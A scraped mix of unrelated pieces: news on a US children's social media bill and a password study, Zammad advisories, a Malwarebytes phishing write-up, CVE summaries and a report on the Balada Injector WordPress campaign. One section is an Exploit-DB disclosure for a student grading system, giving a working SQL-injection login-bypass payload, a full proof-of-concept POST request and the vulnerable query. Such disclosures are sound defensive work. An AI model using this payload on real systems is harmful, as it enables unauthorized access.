The legislation would insert the government into online platforms' age-verification efforts—a move that makes some US lawmakers queasy.

While all the major Silicon Valley social media firms—from Instagram to TikTok—say they block children from using their apps, these senators say those efforts have failed. 

“It’s not working,” Schatz says.“There’s no free speech right to be jammed with an algorithm that makes you upset, and these algorithms are making us increasingly polarized and disparaging and depressed and angry at each other. And it’s bad enough that it’s happening to all of us adults, the least we can do is protect our kids.” 

While the measure’s sponsored by progressive Democrats and one of the most ardent conservatives in the Senate, lawmakers from across the ideological spectrum are equally skeptical of the proposal, showing the difficult road ahead for passing any new media measure, including those aimed at children. Many lawmakers are torn between protecting kids online and preserving the robust internet as we know it. Naturally, most senators are looking at their own families for guidance. 

“My grandkids have flip phones. They don't have smartphones until they get older,” senator Mitt Romney, a Utah Republican, says. Romney—who’s open to the idea, if initially dubious—says there’s not even uniformity in his own family on these issues. 

“I have five sons, so there are five different families and they do have different approaches,” Romney says. “And the youngest son is the one that's most strict, and the oldest son didn't really think of it as being such a big deal.”

For Smith, the Minnesota senator worried about her party coming across as Big Sister, there wasn’t even uniformity in her own household when her boys were fighting over the family’s first desktop computer ages ago. And her kids also proved to be (mini)hackers. 

“We were trying to figure out how to monitor their interactions with the computer, and we quickly figured out that, at least for them, it was hard to put hard and fast rules, because kids find a way,” Smith says. “And different parents have different rules for what they think is the right thing for their kids.”

While Smith is open to the new measure, she’s wary. “I tend to be, I guess, a little bit suspicious of hard and fast rules, because I'm not sure that they work and because I sort of think that parents and kids should have the freedom to decide what’s right for their family,” Smith says.

While Smith is a progressive Democrat, on this new measure, she’s currently aligned with senator Rand Paul, a Libertarian-leaning Kentucky Republican. “Parents exercise some oversight of what their kids view on the internet, what they view on television, all these things are important. I'm not sure I want the federal government \[involved\],” Paul says.

The new measure also has competition. Just last week senators Richard Blumenthal, a Connecticut Democrat, and South Carolina’s Lindsey Graham, the top Republican on the Senate Judiciary Committee, reintroduced their EARN IT Act—the Eliminating Abusive and Rampant Neglect of Interactive Technologies Act. That measure would strip away the current Section 230 protections for any sites that publish online child sexual exploitation content. Section 230 remains a highly controversial law because it protects online businesses from liability for much of what its users post on their platforms.

A US Bill Would Ban Kids Under 13 From Joining Social Media

Simple Student Quarterly Result/Grade System v1.0 was discovered to contain a SQL injection vulnerability via /sqgs/Actions.php.

    # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Linux 
    
    
    
    
    # Vulnerable Code
    
    line 57 in file "/sqgs/Actions.php"
    
    @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
    
    
    Steps To Reproduce:
    * - Go to the login page http://localhost/sqgs/login.php
    
    Payload:
    
    username: admin ' or '1'='1'#--
    password: \
    
    
    
    Proof of Concept :
    
    POST /sqgs/Actions.php?a=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 51
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/sqgs/login.php
    Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
    
    username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

CVE-2022-26633: Offensive Security’s Exploit Database Archive

New analysis reveals basic regulatory password requirements fall far short of providing protection from compromise.

A new look at a database of more than 800 million known-breached passwords reveals that 83% of them met basic security standards set by five different standards agencies. 

Minimum password lengths prescribed by NIST, HITRUST for HIPPS, PCI, ICO for GDPR, and Cyber Essentials for NCSC ranged from seven to 10 and included requirements for password complexity, special characters, and numbers — but none were enough to keep compliant passwords off the breached list, according to a new report from Specops Software. 

"What this data really tells us is that there is a very good reason why some regulatory recommendations now include a compromised password check," said Darren James, product specialist at Specops Software, in a statement about the new password policy research. "Complexity and other rules might help but the most compliant password in the world doesn’t do anything to protect your network if it's on a hacker's compromised password list."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Strong Password Policy Isn't Enough, Study Shows

An access control issue in Zammad v5.0.3 broadcasts administrative configuration changes to all users who have an active application instance, including settings that should only be visible to authenticated users.

Security Advisory

14\. März 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-02
*   Date: 03/14/2022
*   Title: Information Disclosure
*   Severity: low
*   Product: Zammad 5.0.x
*   Fixed in: Zammad 5.1.0
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Information Disclosure**

When an admin changes configuration settings, these changes are broadcasted to any active application instances. Due to incomplete access control checking, these updates would be sent to all users, even for settings which should only be visible to authenticated users.

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/  
    Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-02

Send all remarks on security issues to security@zammad.com.

CVE-2022-27331: Security Advisory ZAA-2022-02 | Zammad

In Zammad 5.2.0, customers who have secondary organizations assigned were able to see all organizations of the system rather than only those to which they are assigned.

Security Advisory

5\. Juli 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-06
*   Date: 07/05/2022
*   Title: Information Disclosure
*   Severity: low
*   Product: Zammad 5.2.x
*   Fixed in: Zammad 5.2.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Information Disclosure**

Customers who have secondary organizations assigned were able to see all organizations of the system rather than only those which they are assigned to.

Special 🙏 and 🤘 and ❤️ to:

*   N: Michael Schwarz
*   C: Schuller&Company
*   W: https://www.schullerandcompany.com/

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-06

Send all remarks on security issues to security@zammad.com.

CVE-2022-35489: Security Advisory ZAA-2022-06 | Zammad

Service inspectors are an evolution of Snort 2's preprocessors, providing access to additional built-in rules that look for protocol-level abnormalities.

ICS protocol coverage using Snort 3 service inspectors

We take a look at a round of phishing mails being sent to people in Belgium, promising tax-related refunds.
The post Watch out for this SMS phish promising a tax refund appeared first on Malwarebytes Labs.

Imagine logging into your bank’s website after responding to a text message claiming you’re due a refund, only to see a warning to watch out for bogus texts:

![](https://blog.malwarebytes.com/wp-content/uploads/2022/04/dbphish7-600x365.jpg)

Beware of SMS phishing!

For those who don’t read Dutch, the warning reads:

> Never respond to unusual emails or texts!
> 
> Fraudsters often send e-mails under the guise of renewing your debit card or digipas. Never go into that. They refer to websites that are not owned by Argenta. Argenta will also never ask you to provide your card number by telephone because you will allegedly receive a new debit card or digipas.
> 
> Do you still receive suspicious messages?
> 
> Have you already passed on codes over the phone? Or has money already been withdrawn from your account? Please contact us immediately on (available 24/7 for victims of phishing).

The warning above is genuine, on a real bank’s website. But the warning, in this case, comes too late because this is the last and only legitimate stop in a victim’s passage through a phishing scam.

**The bogus SMS trail begins**

Here’s one of the suspect SMS messages, as tweeted by Twitter user @ypselon:

> it has been decided that you will receive a refund. to receive this amount you can visit our website \[url removed\]

The text claims to be from “FOD”. This is the Federale Overheidsdienst Financien in Belgium. The suspect URL includes a domain registered just this month (often a red flag), in India, rather than Belgium.

Visiting the site presents you with a message that says:

![](https://blog.malwarebytes.com/wp-content/uploads/2022/04/dbphish1-600x551.jpg)

A fake FOD website offering fake refunds

> Refund:
> 
> In order to receive a refund of your personal income tax, you must verify your account so that we can transfer the full amount of €278.35 to the correct account.
> 
> It is important to carry out a one-time verification as a check. Afterwards you will receive the amount on your account within a few working days.

For “one-time verification” read “send us money”.

We all love a tax refund so it’s an effective hook to lure in potential victims. Continuing reveals a large assortment of banks commonly used in Belgium.

**A slippery phish**

The scam site includes customised pages for each popular bank. Some ask for card details, others for account numbers. All are fake, all are trying to hoover up information that can be used to steal your money.

![](https://blog.malwarebytes.com/wp-content/uploads/2022/04/dbphish5.jpg)

A phishing site asks for credit card details for a “one-time verification”

No matter which route you go down, entering your details will neither verify your identity nor secure you a tax refund. But all will leave you poorer and eventually redirect you to your bank’s real website (where you might encounter a warning about falling for scams like the one you’ve just fallen for).

At this point, your only option is to contact the bank for real, and tell them what’s happened. If you’re lucky, you may be able to have them shut things down. If not, days or weeks of hassle might lie in wait.

**Faking it to make it**

Fake tax refunds are hugely popular. They’re especially rampant during (or immediately following) any tax season. The Federale Overheidsdienst Financien has some advice for avoiding scams like this..

*   **If the FOD helped you with a tax return the previous year**, it may contact you by phone. The organisation warns that if the caller doesn’t know your name; asks for payment for assistance; asks to come to your home; or requests passwords, PINs, email, or address, then you should hang up.
*   **Report any request to provide confidential data** related to banking you receive by email, text, or WhatsApp.
*   **If you’re asked to make a payment to the FOD directly**, check their site because there’s only a limited number of ways to make a payment to an official account.

Watch out for this SMS phish promising a tax refund

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

CVE-2020-9757: craft-seomatic/CHANGELOG.md at v3 · nystudio107/craft-seomatic

In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side Template Injection, allowing for remote code execution.

CVE-2021-41749: craft-seomatic/CHANGELOG.md at develop · nystudio107/craft-seomatic

Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017.
The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. The attacks are known to play out in waves once every few weeks.
"This campaign is easily identified

Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called **Balada Injector** since 2017.

The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. The attacks are known to play out in waves once every few weeks.

"This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites," security researcher Denis Sinegubko said.

The websites include fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to 'Please Allow to verify, that you are not a robot,' thereby enabling the actors to send spam ads.

The report builds on recent findings from Doctor Web, which detailed a Linux malware family that exploits flaws in more than two dozen plugins and themes to compromise vulnerable WordPress sites.

In the interim years, Balada Injector has relied on over 100 domains and a plethora of methods to take advantage of known security flaws (e.g., HTML injection and Site URL), with the attackers primarily attempting to obtain database credentials in the wp-config.php file.

Additionally, the attacks are engineered to read or download arbitrary site files – including backups, database dumps, log and error files – as well as search for tools like adminer and phpmyadmin that could have been left behind by site administrators upon completing maintenance tasks.

The malware ultimately allows for the generation of fake WordPress admin users, harvest data stored in the underlying hosts, and leave backdoors for persistent access.

Balada Injector further carries out broad searches from top-level directories associated with the compromised website's file system to locate writable directories that belong to other sites.

"Most commonly, these sites belong to the webmaster of the compromised site and they all share the same server account and the same file permissions," Sinegubko said. "In this manner, compromising just one site can potentially grant access to several other sites 'for free.'"

Should these attack pathways turn out to be unavailable, the admin password is brute-forced using a set of 74 predefined credentials. WordPress users are, therefore, recommended to keep their website software up-to-date, remove unused plugins and themes, and use strong WordPress admin passwords.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

The findings come weeks after Palo Alto Networks Unit 42 unearthed a similar malicious JavaScript injection campaign that redirects site visitors to adware and scam pages. More than 51,000 websites have been affected since 2022.

The activity, which also employs String.fromCharCode as an obfuscation technique, leads victims to booby-trapped pages that trick them into enabling push notifications by masquerading as a fake CAPTCHA check to serve deceptive content.

"The injected malicious JS code was included on the homepage of more than half of the detected websites," Unit 42 researchers said. "One common tactic used by the campaign's operators was to inject malicious JS code on frequently used JS filenames (e.g., jQuery) that are likely to be included on the homepages of compromised websites."

"This potentially helps attackers target the website's legitimate users, since they are more likely to visit the website's home page."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us